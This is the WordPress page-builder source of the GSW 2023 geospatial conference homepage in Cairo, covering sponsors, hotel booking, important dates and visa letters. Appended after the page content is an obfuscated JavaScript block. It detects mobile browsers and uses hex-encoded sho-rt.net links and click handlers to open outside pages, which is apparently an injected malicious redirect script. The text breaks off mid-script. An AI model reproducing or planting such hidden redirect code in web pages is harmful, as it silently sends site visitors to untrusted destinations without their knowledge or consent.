width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251674466{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a 